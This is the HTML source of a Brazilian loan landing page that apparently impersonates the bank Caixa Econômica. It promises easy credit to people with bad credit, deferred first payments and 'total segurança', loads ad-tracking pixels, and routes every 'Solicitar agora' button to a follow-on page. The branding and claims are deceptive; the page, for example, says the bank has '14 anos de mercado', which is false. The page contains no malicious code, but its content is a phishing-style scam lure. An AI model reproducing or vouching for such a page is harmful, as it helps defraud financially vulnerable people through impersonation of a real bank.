﻿<html lang="pt-BR"><head>
<!-- Google Tag Manager -->
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-TGV5XJVC');</script>
<!-- End Google Tag Manager -->
<script>
  window.pixelId = "67f41a1b2e2b5203c9648cd6";
  var a = document.createElement("script");
  a.setAttribute("async", "");
  a.setAttribute("defer", "");
  a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
  document.head.appendChild(a);
</script>

<script
  src="https://cdn.utmify.com.br/scripts/utms/latest.js"
  async
  defer
></script>

    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">

    <title>Caixa Econômica - Crédito Simples e Rápido</title>
  

<script src="scripts/utms/latest.js" data-utmify-prevent-subids="" async="" defer=""></script>

    <link rel="stylesheet" href="/css/styles.css?v=4">

    <style>
        .max-value {
            font-size: 28px !important;
        }

        .min-value {
            font-size: 22px !important;
        }

        @media (max-width: 480px) {
            .features {
                grid-template-columns: repeat(2, 1fr) !important;
            }
        }
    </style>
    
    
</head>

<body>
    <div class="header" style="background-color: white; padding: 18px; display: flex; justify-content: center;">
        <img src="images/logo.png" alt="" style="width: 100%; max-width: 180px;">
    </div>

    <div class="container">
        <h1>Emprestimos para Negativados, Pagamento em 180 Dias!</h1>

        <p class="subtitle">Simule seu crédito de forma simples e rápida.</p>

        <div class="satisfaction-badge">
            ⭐ Mais de 46 mil clientes satisfeitos
        </div>

        <div class="features">
            <div class="feature">
                <div class="feature-icon">
                    <img src="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 24 24' fill='none' stroke='%23FFFFFF' stroke-width='2' stroke-linecap='round' stroke-linejoin='round'%3E%3Crect x='3' y='3' width='18' height='18' rx='2' ry='2'%3E%3C/rect%3E%3Cline x1='3' y1='9' x2='21' y2='9'%3E%3C/line%3E%3Cline x1='9' y1='21' x2='9' y2='9'%3E%3C/line%3E%3C/svg%3E" alt="Building icon" class="icon">
                </div>

                <div class="feature-text">
                    <span>14 anos</span>

                    <small>de mercado</small>
                </div>
            </div>

            <div class="feature">
                <div class="feature-icon">
                    <img src="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 24 24' fill='none' stroke='%23FFFFFF' stroke-width='2' stroke-linecap='round' stroke-linejoin='round'%3E%3Cpolyline points='20 6 9 17 4 12'%3E%3C/polyline%3E%3C/svg%3E" alt="Check icon" class="icon">
                </div>

                <div class="feature-text">
                    <span>Aprovação</span>

                    <small>em minutos</small>
                </div>
            </div>

            <div class="feature">
                <div class="feature-icon">
                    <img src="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 24 24' fill='none' stroke='%23FFFFFF' stroke-width='2' stroke-linecap='round' stroke-linejoin='round'%3E%3Cpath d='M21 16V8a2 2 0 0 0-1-1.73l-7-4a2 2 0 0 0-2 0l-7 4A2 2 0 0 0 3 8v8a2 2 0 0 0 1 1.73l7 4a2 2 0 0 0 2 0l7-4A2 2 0 0 0 21 16z'%3E%3C/path%3E%3Cpolyline points='7.5 4.21 12 6.81 16.5 4.21'%3E%3C/polyline%3E%3Cpolyline points='7.5 19.79 7.5 14.6 3 12'%3E%3C/polyline%3E%3Cpolyline points='21 12 16.5 14.6 16.5 19.79'%3E%3C/polyline%3E%3Cpolyline points='3.27 6.96 12 12.01 20.73 6.96'%3E%3C/polyline%3E%3Cline x1='12' y1='22.08' x2='12' y2='12'%3E%3C/line%3E%3C/svg%3E" alt="Calculator icon" class="icon">
                </div>

                <div class="feature-text">
                    <span>Simule</span>

                    <small>gratuitamente</small>
                </div>
            </div>

            <div class="feature">
                <div class="feature-icon">
                    <img src="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 24 24' fill='none' stroke='%23FFFFFF' stroke-width='2' stroke-linecap='round' stroke-linejoin='round'%3E%3Cpath d='M12 22s8-4 8-10V5l-8-3-8 3v7c0 6 8 10 8 10z'%3E%3C/path%3E%3C/svg%3E" alt="Shield icon" class="icon">
                </div>

                <div class="feature-text">
                    <span>Total</span>

                    <small>segurança</small>
                </div>
            </div>
        </div>

        <main>
            <div class="credit-card">
                <h2>Crédito para Negativados</h2>

                <p>Recupere a tranquilidade financeira</p>

                <div class="value-range">
                    <span>Valor disponível</span>

                    <div class="values">
                        <span class="min-value">De R$ 2.200</span>

                        <span class="max-value">até R$ 10.500</span>
                    </div>
                </div>

                <div class="payment-info">
                    <img src="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 24 24' fill='none' stroke='%23008F4C' stroke-width='2' stroke-linecap='round' stroke-linejoin='round'%3E%3Ccircle cx='12' cy='12' r='10'%3E%3C/circle%3E%3Cpolyline points='12 6 12 12 16 14'%3E%3C/polyline%3E%3C/svg%3E" alt="Clock icon" class="clock-icon">
                    
                    <span>1ª parcela em 90 dias</span>
                </div>

                <button class="request-btn" onclick="redirectWithUTMs()">Solicitar agora</button>
            </div>

            <div class="credit-card">
                <h2>Crédito para Pessoa Física</h2>

                <p>Transforme sonhos em realidade</p>

                <div class="value-range">
                    <span>Valor disponível</span>

                    <div class="values">
                        <span class="min-value">De R$ 3.000</span>

                        <span class="max-value">até R$ 15.500</span>
                    </div>
                </div>

                <div class="payment-info">
                    <img src="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 24 24' fill='none' stroke='%23008F4C' stroke-width='2' stroke-linecap='round' stroke-linejoin='round'%3E%3Ccircle cx='12' cy='12' r='10'%3E%3C/circle%3E%3Cpolyline points='12 6 12 12 16 14'%3E%3C/polyline%3E%3C/svg%3E" alt="Clock icon" class="clock-icon">

                    <span>1ª parcela em 90 dias</span>
                </div>

                <button class="request-btn" onclick="redirectWithUTMs()">Solicitar agora</button>
            </div>

            <div class="credit-card">
                <h2>Crédito para Pessoa Jurídica</h2>

                <p>Expanda seus negócios</p>

                <div class="value-range">
                    <span>Valor disponível</span>

                    <div class="values">
                        <span class="min-value">De R$ 8.700</span>

                        <span class="max-value">até R$ 35.000</span>
                    </div>
                </div>

                <div class="payment-info">
                    <img src="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 24 24' fill='none' stroke='%23008F4C' stroke-width='2' stroke-linecap='round' stroke-linejoin='round'%3E%3Ccircle cx='12' cy='12' r='10'%3E%3C/circle%3E%3Cpolyline points='12 6 12 12 16 14'%3E%3C/polyline%3E%3C/svg%3E" alt="Clock icon" class="clock-icon">
                    
                    <span>1ª parcela em 120 dias</span>
                </div>

                <button class="request-btn" onclick="redirectWithUTMs()">Solicitar agora</button>
            </div>
        </main>

        <footer>
            <p class="disclaimer">Sujeito a análise de crédito</p>

            <p class="copyright">© Caixa Econômica - Todos os direitos reservados.</p>

            <p class="company-info">CNPJ: 92.001.881/0001-43</p>

            <a href="#" class="privacy-policy">Política de Privacidade</a>
        </footer>
    </div>

    <script>
        function redirectWithUTMs() {
            window.location.href = '../page-02' + window.location.search;
        }
    </script>

  

<script src="scripts/utms/latest.js" data-utmify-prevent-subids="" async="" defer=""></script>

</body><!-- Google Tag Manager (noscript) -->
<noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-TGV5XJVC"
height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
<!-- End Google Tag Manager (noscript) --></html>